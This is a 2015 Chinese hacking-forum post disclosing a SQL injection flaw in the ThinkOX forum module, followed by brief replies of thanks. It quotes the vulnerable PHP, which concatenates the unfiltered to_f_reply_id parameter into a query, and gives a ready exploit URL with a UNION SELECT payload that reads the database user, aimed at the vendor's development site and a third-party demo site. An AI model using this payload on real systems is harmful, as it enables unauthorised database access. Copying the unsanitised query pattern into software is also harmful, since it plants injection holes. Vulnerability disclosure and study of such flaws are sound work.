Thinkox 最新版 SQL 注入

C4r1st · 发表于 2015-4-11 11:01:51

ThinkOX参数未过滤导致SQL注入漏洞。
/Application/Forum/Model/ForumLzlReplyModel.class.php

[PHP] 纯文本查看 复制代码

public function getLZLReplyList($to_f_reply_id, $order, $page=1, $limit)
 
    {
 
        $list = S('post_replylzllist_' . $to_f_reply_id);
 
        if ($list == null) {
 
            $list = D('forum_lzl_reply')->where('is_del=0 and to_f_reply_id=' . $to_f_reply_id)->order($order)->select();
 
            foreach ($list as $k => &$v) {
 
                $v['userInfo'] = query_user(array('avatar128', 'nickname', 'uid', 'space_url', 'icons_html'), $v['uid']);
 
                $v['content'] = op_t($v['content']);
 
            }
 
            unset($v);
 
            S('post_replylzllist_' . $to_f_reply_id, $list, 60);
 
        }
 
        $list = getPage($list, $limit, $page);
 
        return $list;
 
    }

其中

[PHP] 纯文本查看 复制代码

$list = D('forum_lzl_reply')->where('is_del=0 and to_f_reply_id=' . $to_f_reply_id)->order($order)->select();

未经过过滤带入SQL语句导致注入。

exp：

[PHP] 纯文本查看 复制代码

http://dev.opensns.cn/index.php？s=/forum/lzl/lzllist/to_f_reply_id/1%20and%201=2)union%20select%201,2,3,4,user(),6,7,8,9%23.html

test
http://demo.mysuger.cn/index.php ... ly_id/1%20and%201=2)union%20select%201,2,3,4,user(),6,7,8,9%23.html
QQ截图20150411110058.jpg

q1076468651 · 发表于 2015-5-16 08:05:20

新手路过

ljy07 · 发表于 2015-6-27 17:54:05

学习学习技术，加油！

小龙 · 发表于 2015-6-28 14:28:18

支持，看起来不错呢！

Sty，涛 · 发表于 2015-6-29 09:12:28

学习学习技术，加油！

wanmznh · 发表于 2015-6-30 11:10:53

学习学习技术，加油！

yusiii · 发表于 2015-7-1 10:14:27

支持中国红客联盟(ihonker.org)

wanmznh · 发表于 2015-7-2 13:32:05

学习学习技术，加油！

r00tc4 · 发表于 2015-7-2 14:28:30

admin1964 · 发表于 2015-7-4 02:32:48

感谢楼主的分享~

Thinkox 最新版 SQL 注入

相关帖子

指导单位

旗下站点

联系我们